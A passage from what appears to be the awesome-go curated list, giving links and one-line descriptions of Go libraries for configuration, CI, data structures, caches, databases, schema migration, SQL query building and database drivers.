library for managing configuration data from environment variables.\n- [koanf](https://github.com/knadh/koanf) - Light weight, extensible library for reading config in Go applications. Built in support for JSON, TOML, YAML, env, command line.\n- [konfig](https://github.com/lalamove/konfig) - Composable, observable and performant config handling for Go for the distributed processing era.\n- [kong](https://github.com/alecthomas/kong) - Command-line parser with support for arbitrarily complex command-line structures and additional sources of configuration such as YAML, JSON, TOML, etc (successor to `kingpin`).\n- [mini](https://github.com/sasbury/mini) - Golang package for parsing ini-style configuration files.\n- [nasermirzaei89/env](https://github.com/nasermirzaei89/env) - Simple useful package for read environment variables.\n- [nfigure](https://github.com/muir/nfigure) - Per-library struct-tag based configuration from command lines (Posix & Go-style); environment, JSON, YAML\n- [onion](https://github.com/goraz/onion) - Layer based configuration for Go, Supports JSON, TOML, YAML, properties, etcd, env, and encryption using PGP.\n- [piper](https://github.com/Yiling-J/piper) - Viper wrapper with config inheritance and key generation.\n- [store](https://github.com/tucnak/store) - Lightweight configuration manager for Go.\n- [swap](https://github.com/oblq/swap) - Instantiate/configure structs recursively, based on build environment. (YAML, TOML, JSON and env).\n- [typenv](https://github.com/diegomarangoni/typenv) - Minimalistic, zero dependency, typed environment variables library.\n- [uConfig](https://github.com/omeid/uconfig) - Lightweight, zero-dependency, and extendable configuration management.\n- [viper](https://github.com/spf13/viper) - Go configuration with fangs.\n- [xdg](https://github.com/adrg/xdg) - Go implementation of the [XDG Base Directory Specification](https://specifications.freedesktop.org/basedir-spec/basedir-spec-latest.html) and [XDG user directories](https://wiki.archlinux.org/index.php/XDG_user_directories).\n- [xdg](https://github.com/OpenPeeDeeP/xdg) - Cross platform package that follows the [XDG Standard](https://standards.freedesktop.org/basedir-spec/basedir-spec-latest.html).\n\n**[⬆ back to top](#contents)**\n\n## Continuous Integration\n\n_Tools for help with continuous integration._\n\n- [CDS](https://github.com/ovh/cds) - Enterprise-Grade CI/CD and DevOps Automation Open Source Platform.\n- [drone](https://github.com/drone/drone) - Drone is a Continuous Integration platform built on Docker, written in Go.\n- [duci](https://github.com/duck8823/duci) - A simple ci server no needs domain specific languages.\n- [go-fuzz-action](https://github.com/jidicula/go-fuzz-action) - Use Go 1.18's built-in fuzz testing in GitHub Actions.\n- [go-test-coverage](https://github.com/vladopajic/go-test-coverage) - Tool and GitHub action which reports issues when test coverage is below set threshold.\n- [gomason](https://github.com/nikogura/gomason) - Test, Build, Sign, and Publish your go binaries from a clean workspace.\n- [gotestfmt](https://github.com/GoTestTools/gotestfmt) - go test output for humans.\n- [goveralls](https://github.com/mattn/goveralls) - Go integration for Coveralls.io continuous code coverage tracking system.\n- [overalls](https://github.com/go-playground/overalls) - Multi-Package go project coverprofile for tools like goveralls.\n- [roveralls](https://github.com/LawrenceWoodman/roveralls) - Recursive coverage testing tool.\n- [woodpecker](https://github.com/woodpecker-ci/woodpecker) - Woodpecker is a community fork of the Drone CI system.\n\n**[⬆ back to top](#contents)**\n\n## CSS Preprocessors\n\n_Libraries for preprocessing CSS files._\n\n- [gcss](https://github.com/yosssi/gcss) - Pure Go CSS Preprocessor.\n- [go-libsass](https://github.com/wellington/go-libsass) - Go wrapper to the 100% Sass compatible libsass project.\n\n**[⬆ back to top](#contents)**\n\n## Data Structures and Algorithms\n\n### Bit-packing and Compression\n\n- [bingo](https://github.com/iancmcc/bingo) - Fast, zero-allocation, lexicographical-order-preserving packing of native types to bytes.\n- [binpacker](https://github.com/zhuangsirui/binpacker) - Binary packer and unpacker helps user build custom binary stream.\n- [bit](https://github.com/yourbasic/bit) - Golang set data structure with bonus bit-twiddling functions.\n- [crunch](https://github.com/superwhiskers/crunch) - Go package implementing buffers for handling various datatypes easily.\n- [go-ef](https://github.com/amallia/go-ef) - A Go implementation of the Elias-Fano encoding.\n- [roaring](https://github.com/RoaringBitmap/roaring) - Go package implementing compressed bitsets.\n\n### Bit Sets\n\n- [bitmap](https://github.com/kelindar/bitmap) - Dense, zero-allocation, SIMD-enabled bitmap/bitset in Go.\n- [bitset](https://github.com/bits-and-blooms/bitset) - Go package implementing bitsets.\n\n### Bloom and Cuckoo Filters\n\n- [bloom](https://github.com/bits-and-blooms/bloom) - Go package implementing Bloom filters.\n- [bloom](https://github.com/zhenjl/bloom) - Bloom filters implemented in Go.\n- [bloom](https://github.com/yourbasic/bloom) - Golang Bloom filter implementation.\n- [bloomfilter](https://github.com/OldPanda/bloomfilter) - Yet another Bloomfilter implementation in Go, compatible with Java's Guava library.\n- [boomfilters](https://github.com/tylertreat/BoomFilters) - Probabilistic data structures for processing continuous, unbounded streams.\n- [cuckoo-filter](https://github.com/linvon/cuckoo-filter) - Cuckoo filter: a comprehensive cuckoo filter, which is configurable and space optimized compared with other implements, and all features mentioned in original paper is available.\n- [cuckoofilter](https://github.com/seiflotfy/cuckoofilter) - Cuckoo filter: a good alternative to a counting bloom filter implemented in Go.\n- [ring](https://github.com/TheTannerRyan/ring) - Go implementation of a high performance, thread safe bloom filter.\n\n### Data Structure and Algorithm Collections\n\n- [algorithms](https://github.com/shady831213/algorithms) - Algorithms and data structures.CLRS study.\n- [go-datastructures](https://github.com/Workiva/go-datastructures) - Collection of useful, performant, and thread-safe data structures.\n- [gods](https://github.com/emirpasic/gods) - Go Data Structures. Containers, Sets, Lists, Stacks, Maps, BidiMaps, Trees, HashSet etc.\n- [gostl](https://github.com/liyue201/gostl) - Data structure and algorithm library for go, designed to provide functions similar to C++ STL.\n\n### Iterators\n\n- [goterator](https://github.com/yaa110/goterator) - Iterator implementation to provide map and reduce functionalities.\n- [iter](https://github.com/disksing/iter) - Go implementation of C++ STL iterators and algorithms.\n\n### Maps\n\nSee also [Database](#database) for more complex key-value stores, and [Trees](#trees) for\nadditional ordered map implementations.\n\n- [cmap](https://github.com/lrita/cmap) - a thread-safe concurrent map for go, support using `interface{}` as key and auto scale up shards.\n- [dict](https://github.com/srfrog/dict) - Python-like dictionaries (dict) for Go.\n- [goradd/maps](https://github.com/goradd/maps) - Go 1.18+ generic map interface for maps; safe maps; ordered maps; ordered, safe maps; etc.\n\n### Miscellaneous Data Structures and Algorithms\n\n- [concurrent-writer](https://github.com/free/concurrent-writer) - Highly concurrent drop-in replacement for `bufio.Writer`.\n- [conjungo](https://github.com/InVisionApp/conjungo) - A small, powerful and flexible merge library.\n- [count-min-log](https://github.com/seiflotfy/count-min-log) - Go implementation Count-Min-Log sketch: Approximately counting with approximate counters (Like Count-Min sketch but using less memory).\n- [fsm](https://github.com/cocoonspace/fsm) - Finite-State Machine package.\n- [genfuncs](https://github.com/nwillc/genfuncs) - Go 1.18+ generics package inspired by Kotlin's Sequence and Map.\n- [go-generics](https://github.com/bobg/go-generics) - Generic slice, map, set, iterator, and goroutine utilities.\n- [go-geoindex](https://github.com/hailocab/go-geoindex) - In-memory geo index.\n- [go-rampart](https://github.com/francesconi/go-rampart) - Determine how intervals relate to each other.\n- [go-rquad](https://github.com/aurelien-rainone/go-rquad) - Region quadtrees with efficient point location and neighbour finding.\n- [go-tuple](https://github.com/barweiss/go-tuple) - Generic tuple implementation for Go 1.18+.\n- [go18ds](https://github.com/daichi-m/go18ds) - Go Data Structures using Go 1.18 generics.\n- [gofal](https://github.com/xxjwxc/gofal) - fractional api for Go.\n- [gogu](https://github.com/esimov/gogu) - A comprehensive, reusable and efficient concurrent-safe generics utility functions and data structures library.\n- [gota](https://github.com/kniren/gota) - Implementation of dataframes, series, and data wrangling methods for Go.\n- [hide](https://github.com/emvi/hide) - ID type with marshalling to/from hash to prevent sending IDs to clients.\n- [hilbert](https://github.com/google/hilbert) - Go package for mapping values to and from space-filling curves, such as Hilbert and Peano curves.\n- [hyperloglog](https://github.com/axiomhq/hyperloglog) - HyperLogLog implementation with Sparse, LogLog-Beta bias correction and TailCut space reduction.\n- [quadtree](https://github.com/s0rg/quadtree) - Generic, zero-alloc, 100%-test covered quadtree.\n- [slices](https://github.com/srfrog/slices) - Functions that operate on slices; like `package strings` but adapted to work with slices.\n- [slices](https://github.com/twharmon/slices) - Pure, generic functions for slices.\n\n### Nullable Types\n\n- [nan](https://github.com/kak-tus/nan) - Zero allocation Nullable structures in one library with handy conversion functions, marshallers and unmarshallers.\n- [null](https://github.com/emvi/null) - Nullable Go types that can be marshalled/unmarshalled to/from JSON.\n- [typ](https://github.com/gurukami/typ) - Null Types, Safe primitive type conversion and fetching value from complex structures.\n\n### Queues\n\n- [deque](https://github.com/edwingeng/deque) - A highly optimized double-ended queue.\n- [deque](https://github.com/gammazero/deque) - Fast ring-buffer deque (double-ended queue).\n- [goconcurrentqueue](https://github.com/enriquebris/goconcurrentqueue) - Concurrent FIFO queue.\n- [memlog](https://github.com/embano1/memlog) - An easy to use, lightweight, thread-safe and append-only in-memory data structure inspired by Apache Kafka.\n- [queue](https://github.com/adrianbrad/queue) - Multiple thread-safe, generic queue implementations for Go.\n\n### Sets\n\n- [dsu](https://github.com/ihebu/dsu) - Disjoint Set data structure implementation in Go.\n- [golang-set](https://github.com/deckarep/golang-set) - Thread-Safe and Non-Thread-Safe high-performance sets for Go.\n- [goset](https://github.com/zoumo/goset) - A useful Set collection implementation for Go.\n- [set](https://github.com/StudioSol/set) - Simple set data structure implementation in Go using LinkedHashMap.\n\n### Text Analysis\n\n- [bleve](https://github.com/blevesearch/bleve) - Modern text indexing library for go.\n- [go-adaptive-radix-tree](https://github.com/plar/go-adaptive-radix-tree) - Go implementation of Adaptive Radix Tree.\n- [go-edlib](https://github.com/hbollon/go-edlib) - Go string comparison and edit distance algorithms library (Levenshtein, LCS, Hamming, Damerau levenshtein, Jaro-Winkler, etc.) compatible with Unicode.\n- [levenshtein](https://github.com/agext/levenshtein) - Levenshtein distance and similarity metrics with customizable edit costs and Winkler-like bonus for common prefix.\n- [levenshtein](https://github.com/agnivade/levenshtein) - Implementation to calculate levenshtein distance in Go.\n- [mspm](https://github.com/BlackRabbitt/mspm) - Multi-String Pattern Matching Algorithm for information retrieval.\n- [parsefields](https://github.com/MonaxGT/parsefields) - Tools for parse JSON-like logs for collecting unique fields and events.\n- [ptrie](https://github.com/viant/ptrie) - An implementation of prefix tree.\n- [trie](https://github.com/derekparker/trie) - Trie implementation in Go.\n\n### Trees\n\n- [hashsplit](http://github.com/bobg/hashsplit) - Split byte streams into chunks, and arrange chunks into trees, with boundaries determined by content, not position.\n- [merkle](https://github.com/bobg/merkle) - Space-efficient computation of Merkle root hashes and inclusion proofs.\n- [skiplist](https://github.com/MauriceGit/skiplist) - Very fast Go Skiplist implementation.\n- [skiplist](https://github.com/gansidui/skiplist) - Skiplist implementation in Go.\n- [treap](https://github.com/perdata/treap) - Persistent, fast ordered map using tree heaps.\n- [treemap](https://github.com/igrmk/treemap) - Generic key-sorted map using a red-black tree under the hood.\n\n### Pipes\n\n- [ordered-concurrently](https://github.com/tejzpr/ordered-concurrently) - Go module that processes work concurrently and returns output in a channel in the order of input.\n- [parapipe](https://github.com/nazar256/parapipe) - FIFO Pipeline which parallels execution on each stage while maintaining the order of messages and results.\n- [pipeline](https://github.com/hyfather/pipeline) - An implementation of pipelines with fan-in and fan-out.\n\n**[⬆ back to top](#contents)**\n\n## Database\n\n### Caches\n\n_Data stores with expiring records, in-memory distributed data stores, or in-memory subsets of file-based databases._\n\n- [2q](https://github.com/floatdrop/2q) - 2Q in-memory cache implementation.\n- [bcache](https://github.com/iwanbk/bcache) - Eventually consistent distributed in-memory cache Go library.\n- [BigCache](https://github.com/allegro/bigcache) - Efficient key/value cache for gigabytes of data.\n- [cache](https://github.com/akyoto/cache) - In-memory key:value store with expiration time, 0 dependencies, <100 LoC, 100% coverage.\n- [cache2go](https://github.com/muesli/cache2go) - In-memory key:value cache which supports automatic invalidation based on timeouts.\n- [cachego](https://github.com/faabiosr/cachego) - Golang Cache component for multiple drivers.\n- [clusteredBigCache](https://github.com/oaStuff/clusteredBigCache) - BigCache with clustering support and individual item expiration.\n- [couchcache](https://github.com/codingsince1985/couchcache) - RESTful caching micro-service backed by Couchbase server.\n- [fastcache](https://github.com/VictoriaMetrics/fastcache) - fast thread-safe inmemory cache for big number of entries. Minimizes GC overhead.\n- [GCache](https://github.com/bluele/gcache) - Cache library with support for expirable Cache, LFU, LRU and ARC.\n- [gdcache](https://github.com/ulovecode/gdcache) - A pure non-intrusive cache library implemented by golang, you can use it to implement your own distributed cache.\n- [go-cache](https://github.com/viney-shih/go-cache) - A flexible multi-layer Go caching library to deal with in-memory and shared cache by adopting Cache-Aside pattern.\n- [go-mcache](https://github.com/OrlovEvgeny/go-mcache) - Fast in-memory key:value store/cache library. Pointer caches.\n- [gocache](https://github.com/eko/gocache) - A complete Go cache library with multiple stores (memory, memcache, redis, ...), chainable, loadable, metrics cache and more.\n- [gocache](https://github.com/yuseferi/gocache) - A data race free Go ache library with high performance and auto pruge functionality\n- [groupcache](https://github.com/golang/groupcache) - Groupcache is a caching and cache-filling library, intended as a replacement for memcached in many cases.\n- [imcache](https://github.com/erni27/imcache) - A generic in-memory cache Go library. It supports expiration, sliding expiration, max entries limit, eviction callbacks and sharding.\n- [nscache](https://github.com/no-src/nscache) - A Go caching framework that supports multiple data source drivers.\n- [remember-go](https://github.com/rocketlaunchr/remember-go) - A universal interface for caching slow database queries (backed by redis, memcached, ristretto, or in-memory).\n- [theine](https://github.com/Yiling-J/theine-go) - High performance, near optimal in-memory cache with proactive TTL expiration and generics.\n- [timedmap](https://github.com/zekroTJA/timedmap) - Map with expiring key-value pairs.\n- [ttlcache](https://github.com/jellydator/ttlcache) - An in-memory cache with item expiration and generics.\n- [ttlcache](https://github.com/cheshir/ttlcache) - In-memory key value storage with TTL for each record.\n\n### Databases Implemented in Go\n\n- [badger](https://github.com/dgraph-io/badger) - Fast key-value store in Go.\n- [bbolt](https://github.com/etcd-io/bbolt) - An embedded key/value database for Go.\n- [Bitcask](https://git.mills.io/prologic/bitcask) - Bitcask is an embeddable, persistent and fast key-value (KV) database written in pure Go with predictable read/write performance, low latency and high throughput thanks to the bitcask on-disk layout (LSM+WAL).\n- [buntdb](https://github.com/tidwall/buntdb) - Fast, embeddable, in-memory key/value database for Go with custom indexing and spatial support.\n- [clover](https://github.com/ostafen/clover) - A lightweight document-oriented NoSQL database written in pure Golang.\n- [cockroach](https://github.com/cockroachdb/cockroach) - Scalable, Geo-Replicated, Transactional Datastore.\n- [Coffer](https://github.com/claygod/coffer) - Simple ACID key-value database that supports transactions.\n- [column](https://github.com/kelindar/column) - High-performance, columnar, embeddable in-memory store with bitmap indexing and transactions.\n- [CovenantSQL](https://github.com/CovenantSQL/CovenantSQL) - CovenantSQL is a SQL database on blockchain.\n- [Databunker](https://github.com/paranoidguy/databunker) - Personally identifiable information (PII) storage service built to comply with GDPR and CCPA.\n- [dgraph](https://github.com/dgraph-io/dgraph) - Scalable, Distributed, Low Latency, High Throughput Graph Database.\n- [diskv](https://github.com/peterbourgon/diskv) - Home-grown disk-backed key-value store.\n- [dolt](https://github.com/dolthub/dolt) - Dolt – It's Git for Data.\n- [dtf](https://github.com/dtm-labs/dtf) - A distributed transaction manager. Support XA, TCC, SAGA, Reliable Messages.\n- [eliasdb](https://github.com/krotik/eliasdb) - Dependency-free, transactional graph database with REST API, phrase search and SQL-like query language.\n- [godis](https://github.com/hdt3213/godis) - A Golang implemented high-performance Redis server and cluster.\n- [goleveldb](https://github.com/syndtr/goleveldb) - Implementation of the [LevelDB](https://github.com/google/leveldb) key/value database in Go.\n- [hare](https://github.com/jameycribbs/hare) - A simple database management system that stores each table as a text file of line-delimited JSON.\n- [immudb](https://github.com/codenotary/immudb) - immudb is a lightweight, high-speed immutable database for systems and applications written in Go.\n- [influxdb](https://github.com/influxdb/influxdb) - Scalable datastore for metrics, events, and real-time analytics.\n- [ledisdb](https://github.com/siddontang/ledisdb) - Ledisdb is a high performance NoSQL like Redis based on LevelDB.\n- [levigo](https://github.com/jmhodges/levigo) - Levigo is a Go wrapper for LevelDB.\n- [libradb](https://github.com/amit-davidson/LibraDB) - LibraDB is a simple database with less then 1000 lines of code for learning.\n- [lotusdb](https://github.com/flower-corp/lotusdb) - Fast k/v database compatible with lsm and b+tree.\n- [Milvus](https://github.com/milvus-io/milvus) - Milvus is a vector database for embedding management, analytics and search.\n- [moss](https://github.com/couchbase/moss) - Moss is a simple LSM key-value storage engine written in 100% Go.\n- [nutsdb](https://github.com/xujiajun/nutsdb) - Nutsdb is a simple, fast, embeddable, persistent key/value store written in pure Go. It supports fully serializable transactions and many data structures such as list, set, sorted set.\n- [objectbox-go](https://github.com/objectbox/objectbox-go) - High-performance embedded Object Database (NoSQL) with Go API.\n- [piladb](https://github.com/fern4lvarez/piladb) - Lightweight RESTful database engine based on stack data structures.\n- [pogreb](https://github.com/akrylysov/pogreb) - Embedded key-value store for read-heavy workloads.\n- [prometheus](https://github.com/prometheus/prometheus) - Monitoring system and time series database.\n- [pudge](https://github.com/recoilme/pudge) - Fast and simple key/value store written using Go's standard library.\n- [regatta](https://github.com/jamf/regatta) - Fast, simple, geo-distributed KV store built for cloud native era.\n- [rosedb](https://github.com/roseduan/rosedb) - An embedded k-v database based on LSM+WAL, supports string, list, hash, set, zset.\n- [rqlite](https://github.com/rqlite/rqlite) - The lightweight, distributed, relational database built on SQLite.\n- [tempdb](https://github.com/rafaeljesus/tempdb) - Key-value store for temporary items.\n- [tidb](https://github.com/pingcap/tidb) - TiDB is a distributed SQL database. Inspired by the design of Google F1.\n- [tiedot](https://github.com/HouzuoGuo/tiedot) - Your NoSQL database powered by Golang.\n- [unitdb](https://github.com/unit-io/unitdb) - Fast timeseries database for IoT, realtime messaging applications. Access unitdb with pubsub over tcp or websocket using github.com/unit-io/unitd application.\n- [Vasto](https://github.com/chrislusf/vasto) - A distributed high-performance key-value store. On Disk. Eventual consistent. HA. Able to grow or shrink without service interruption.\n- [VictoriaMetrics](https://github.com/VictoriaMetrics/VictoriaMetrics) - fast, resource-effective and scalable open source time series database. May be used as long-term remote storage for Prometheus. Supports PromQL.\n\n### Database Schema Migration\n\n- [atlas](https://github.com/ariga/atlas) - A Database Toolkit. A CLI designed to help companies better work with their data.\n- [avro](https://github.com/khezen/avro) - Discover SQL schemas and convert them to AVRO schemas. Query SQL records into AVRO bytes.\n- [bytebase](https://github.com/bytebase/bytebase) - Safe database schema change and version control for DevOps teams.\n- [darwin](https://github.com/GuiaBolso/darwin) - Database schema evolution library for Go.\n- [dbmate](https://github.com/amacneil/dbmate) - A lightweight, framework-agnostic database migration tool.\n- [go-fixtures](https://github.com/RichardKnop/go-fixtures) - Django style fixtures for Golang's excellent built-in database/sql library.\n- [go-pg-migrate](https://github.com/lawzava/go-pg-migrate) - CLI-friendly package for go-pg migrations management.\n- [go-pg-migrations](https://github.com/robinjoseph08/go-pg-migrations) - A Go package to help write migrations with go-pg/pg.\n- [goavro](https://github.com/linkedin/goavro) - A Go package that encodes and decodes Avro data.\n- [godfish](https://github.com/rafaelespinoza/godfish) - Database migration manager, works with native query language. Support for cassandra, mysql, postgres, sqlite3.\n- [goose](https://github.com/pressly/goose) - Database migration tool. You can manage your database's evolution by creating incremental SQL or Go scripts.\n- [gorm-seeder](https://github.com/Kachit/gorm-seeder) - Simple database seeder for Gorm ORM.\n- [gormigrate](https://github.com/go-gormigrate/gormigrate) - Database schema migration helper for Gorm ORM.\n- [libschema](https://github.com/muir/libschema) - Define your migrations separately in each library. Migrations for open source libraries. MySQL & PostgreSQL.\n- [migrate](https://github.com/golang-migrate/migrate) - Database migrations. CLI and Golang library.\n- [migrator](https://github.com/lopezator/migrator) - Dead simple Go database migration library.\n- [migrator](https://github.com/larapulse/migrator) - MySQL database migrator designed to run migrations to your features and manage database schema update with intuitive go code.\n- [schema](https://github.com/adlio/schema) - Library to embed schema migrations for database/sql-compatible databases inside your Go binaries.\n- [skeema](https://github.com/skeema/skeema) - Pure-SQL schema management system for MySQL, with support for sharding and external online schema change tools.\n- [soda](https://github.com/gobuffalo/pop/tree/master/soda) - Database migration, creation, ORM, etc... for MySQL, PostgreSQL, and SQLite.\n- [sql-migrate](https://github.com/rubenv/sql-migrate) - Database migration tool. Allows embedding migrations into the application using go-bindata.\n- [sqlize](https://github.com/sunary/sqlize) - Database migration generator. Allows generate sql migration from model and existing sql by differ them.\n\n### Database Tools\n\n- [chproxy](https://github.com/Vertamedia/chproxy) - HTTP proxy for ClickHouse database.\n- [clickhouse-bulk](https://github.com/nikepan/clickhouse-bulk) - Collects small inserts and sends big requests to ClickHouse servers.\n- [datagen](https://github.com/codingconcepts/datagen) - A fast data generator that's multi-table aware and supports multi-row DML.\n- [dbbench](https://github.com/sj14/dbbench) - Database benchmarking tool with support for several databases and scripts.\n- [dynago](https://github.com/twharmon/dynago) - Simplify working with AWS DynamoDB.\n- [go-mysql](https://github.com/siddontang/go-mysql) - Go toolset to handle MySQL protocol and replication.\n- [go-mysql-elasticsearch](https://github.com/siddontang/go-mysql-elasticsearch) - Sync your MySQL data into Elasticsearch automatically.\n- [hasql](https://golang.yandex/hasql) - Library for accessing multi-host SQL database installations.\n- [kingshard](https://github.com/flike/kingshard) - kingshard is a high performance proxy for MySQL powered by Golang.\n- [octillery](https://github.com/knocknote/octillery) - Go package for sharding databases ( Supports every ORM or raw SQL ).\n- [onedump](https://github.com/liweiyi88/onedump) - Database backup from different drivers to different destinations with one command and configuration.\n- [orchestrator](https://github.com/github/orchestrator) - MySQL replication topology manager & visualizer.\n- [pg_timetable](https://github.com/cybertec-postgresql/pg_timetable) - Advanced scheduling for PostgreSQL.\n- [pgweb](https://github.com/sosedoff/pgweb) - Web-based PostgreSQL database browser.\n- [prep](https://github.com/hexdigest/prep) - Use prepared SQL statements without changing your code.\n- [pREST](https://github.com/prest/prest) - Simplify and accelerate development, ⚡ instant, realtime, high-performance on any Postgres application, existing or new.\n- [rdb](https://github.com/HDT3213/rdb) - Redis RDB file parser for secondary development and memory analysis.\n- [rwdb](https://github.com/andizzle/rwdb) - rwdb provides read replica capability for multiple database servers setup.\n- [vitess](https://github.com/youtube/vitess) - vitess provides servers and tools which facilitate scaling of MySQL databases for large scale web services.\n\n### SQL Query Builders\n\n_Libraries for building and using SQL._\n\n- [bqb](https://github.com/nullism/bqb) - Lightweight and easy to learn query builder.\n- [buildsqlx](https://github.com/arthurkushman/buildsqlx) - Go database query builder library for PostgreSQL.\n- [builq](https://github.com/cristalhq/builq) - Easily build SQL queries in Go.\n- [dbq](https://github.com/rocketlaunchr/dbq) - Zero boilerplate database operations for Go.\n- [Dotsql](https://github.com/gchaincl/dotsql) - Go library that helps you keep sql files in one place and use them with ease.\n- [gendry](https://github.com/didi/gendry) - Non-invasive SQL builder and powerful data binder.\n- [godbal](https://github.com/xujiajun/godbal) - Database Abstraction Layer (dbal) for go. Support SQL builder and get result easily.\n- [goqu](https://github.com/doug-martin/goqu) - Idiomatic SQL builder and query library.\n- [gosql](https://github.com/twharmon/gosql) - SQL Query builder with better null values support.\n- [igor](https://github.com/galeone/igor) - Abstraction layer for PostgreSQL that supports advanced functionality and uses gorm-like syntax.\n- [jet](https://github.com/go-jet/jet) - Framework for writing type-safe SQL queries in Go, with ability to easily convert database query result into desired arbitrary object structure.\n- [ormlite](https://github.com/pupizoid/ormlite) - Lightweight package containing some ORM-like features and helpers for sqlite databases.\n- [ozzo-dbx](https://github.com/go-ozzo/ozzo-dbx) - Powerful data retrieval methods as well as DB-agnostic query building capabilities.\n- [qry](https://github.com/HnH/qry) - Tool that generates constants from files with raw SQL queries.\n- [sg](https://github.com/go-the-way/sg) - A SQL Gen for generating standard SQLs(supports: CRUD) written in Go.\n- [sq](https://github.com/bokwoon95/go-structured-query) - Type-safe SQL builder and struct mapper for Go.\n- [sqlc](https://github.com/kyleconroy/sqlc) - Generate type-safe code from SQL.\n- [sqlf](https://github.com/leporo/sqlf) - Fast SQL query builder.\n- [sqlingo](https://github.com/lqs/sqlingo) - A lightweight DSL to build SQL in Go.\n- [sqrl](https://github.com/elgris/sqrl) - SQL query builder, fork of Squirrel with improved performance.\n- [Squalus](https://gitlab.com/qosenergy/squalus) - Thin layer over the Go SQL package that makes it easier to perform queries.\n- [Squirrel](https://github.com/Masterminds/squirrel) - Go library that helps you build SQL queries.\n- [xo](https://github.com/knq/xo) - Generate idiomatic Go code for databases based on existing schema definitions or custom queries supporting PostgreSQL, MySQL, SQLite, Oracle, and Microsoft SQL Server.\n\n**[⬆ back to top](#contents)**\n\n## Database Drivers\n\n### Interfaces to Multiple Backends\n\n- [cayley](https://github.com/google/cayley) - Graph database with support for multiple backends.\n- [dsc](https://github.com/viant/dsc) - Datastore connectivity for SQL, NoSQL, structured files.\n- [go-transaction-manager](https://github.com/avito-tech/go-transaction-manager) - Transaction manager with multiple adapters (sql, sqlx, gorm, mongo, ...) controls transaction boundaries.\n- [gokv](https://github.com/philippgille/gokv) - Simple key-value store abstraction and implementations for Go (Redis, Consul, etcd, bbolt, BadgerDB, LevelDB, Memcached, DynamoDB, S3, PostgreSQL, MongoDB, CockroachDB and many more).\n\n### Relational Database Drivers\n\n- [avatica](https://github.com/apache/calcite-avatica-go) - Apache Avatica/Phoenix SQL driver for database/sql.\n- [bgc](https://github.com/viant/bgc) - Datastore Connectivity for BigQuery for go.\n- [firebirdsql](https://github.com/nakagami/firebirdsql) - Firebird RDBMS SQL driver for Go.\n- [go-adodb](https://github.com/mattn/go-adodb) - Microsoft ActiveX Object DataBase driver for go that uses database/sql.\n- [go-mssqldb](https://github.com/denisenkom/go-mssqldb) - Microsoft MSSQL driver for Go.\n- [go-oci8](https://github.com/mattn/go-oci8) - Oracle driver for go that uses database/sql.\n- [go-sql-driver/mysql](https://github.com/go-sql-driver/mysql) - MySQL driver for Go.\n- [go-sqlite3](https://github.com/mattn/go-sqlite3) - SQLite3 driver for go that uses database/sql.\n- [godror](https://github.com/godror/godror) - Oracle driver for Go, using the ODPI-C driver.\n- [gofreetds](https://github.com/minus5/gofreetds) - Microsoft MSSQL driver. Go wrapper over [FreeTDS](https://www.freetds.org).\n- [KSQL](https://github.com/VinGarcia/ksql) - A Simple and Powerful Golang SQL Library\n- [pgx](https://github.com/jackc/pgx) - PostgreSQL driver supporting features beyond those exposed by database/sql.\n- [pig](https://github.com/alexeyco/pig) - Simple [pgx](https://github.com/jackc/pgx) wrapper to execute and [scan](https://github.com/georgysavva/scany) query results easily.\n- [pq](https://github.com/lib/pq) - Pure Go Postgres driver for database/sql.\n- [Sqinn-Go](https://github.com/cvilsmeier/sqinn-go) - SQLite with pure Go.\n- [sqlhooks](https://github.com/qustavo/sqlhooks) - Attach hooks to any database/sql driver.\n- [surrealdb.go](https://github.com/surrealdb/surrealdb.go) - SurrealDB Driver for Go.\n- [ydb-go-sdk](https://github.com/ydb-platform/ydb-go-sdk) - native and database/sql driver YDB (Yandex Database)\n\n### NoSQL Database Drivers\n\n- [aerospike-client-go](https://github.com/aerospike/aerospike-client-go) - Aerospike client in Go language.\n- [arangolite](https://github.com/solher/arangolite) - Lightweight golang driver for ArangoDB.\n- [asc](https://github.com/viant/asc) - Datastore Connectivity for Aerospike for go.\n- [forestdb](https://github.com/couchbase/goforestdb) - Go bindings for ForestDB.\n- [go-couchbase](https://github.com/couchbase/go-couchbase) - Couchbase client in Go.\n- [go-pilosa](https://github.com/pilosa/go-pilosa) - Go client library for Pilosa.\n- [go-rejson](https://github.com/nitishm/go-rejson) - Golang client for redislabs' ReJSON module using Redigo golang client. Store and manipulate structs as JSON objects in redis with ease.\n- [gocb](https://github.com/couchbase/gocb) - Official Couchbase Go SDK.\n- [gocosmos](https://github.com/btnguyen2k/gocosmos) - REST client and standard `database/sql` driver for Azure Cosmos DB.\n- [gocql](https://gocql.github.io) - Go language driver for Apache Cassandra.\n- [godis](https://github.com/piaohao/godis) - redis client implement by golang, inspired by jedis.\n- [godscache](https://github.com/defcronyke/godscache) - A wrapper for the Google Cloud Platform Go Datastore package that adds caching using memcached.\n- [gomemcache](https://github.com/bradfitz/gomemcache/) - memcache client library for the Go programming language.\n- [gorethink](https://github.com/dancannon/gorethink) - Go language driver for RethinkDB.\n- [goriak](https://github.com/zegl/goriak) - Go language driver for Riak KV.\n- [Kivik](https://github.com/go-kivik/kivik) - Kivik provides a common Go and GopherJS client library for CouchDB, PouchDB, and similar databases.\n- [mgm](https://github.com/kamva/mgm) - MongoDB model-based ODM for Go (based on official MongoDB driver).\n- [mgo](https://github.com/globalsign/mgo) - (unmaintained) MongoDB driver for the Go language that implements a rich and well tested selection of features under a very simple API following standard Go idioms.\n- [mongo-go-driver](https://github.com/mongodb/mongo-go-driver) - Official MongoDB driver for the Go language.\n- [neo4j](https://github.com/cihangir/neo4j) - Neo4j Rest API Bindings for Golang.\n- [Neo4j-GO](https://github.com/davemeehan/Neo4j-GO) - Neo4j REST Client in golang.\n- [neoism](https://github.com/jmcvetta/neoism) - Neo4j client for Golang.\n- [qmgo](https://github.com/qiniu/qmgo) - The MongoDB driver for Go. It‘s based on official MongoDB driver but easier to use like Mgo.\n- [redeo](https://github.com/bsm/redeo) - Redis-protocol compatible TCP servers/services.\n- [redigo](https://github.com/gomodule/redigo) - Redigo is a Go client for the Redis database.\n- [redis](https://github.com/redis/go-redis) - Redis client for Golang.\n- [rueidis](http://github.com/rueian/rueidis) - Fast Redis RESP3 client with auto pipelining and server-assisted client side caching.\n- [xredis](https://github.com/shomali11/xredis) - Typesafe, customizable, clean & easy to use Redis client.\n\n### Search and Analytic Databases\n\n- [elastic](https://github.com/olivere/elastic) - Elasticsearch client for Go.\n- [elasticsql](https://github.com/cch123/elasticsql) - Convert sql to elasticsearch dsl in Go.\n- [elastigo](https://github.com/mattbaird/elastigo) - Elasticsearch client library.\n- [go-elasticsearch](https://github.com/elastic/go-elasticsearch) - Official Elasticsearch client for Go.\n- 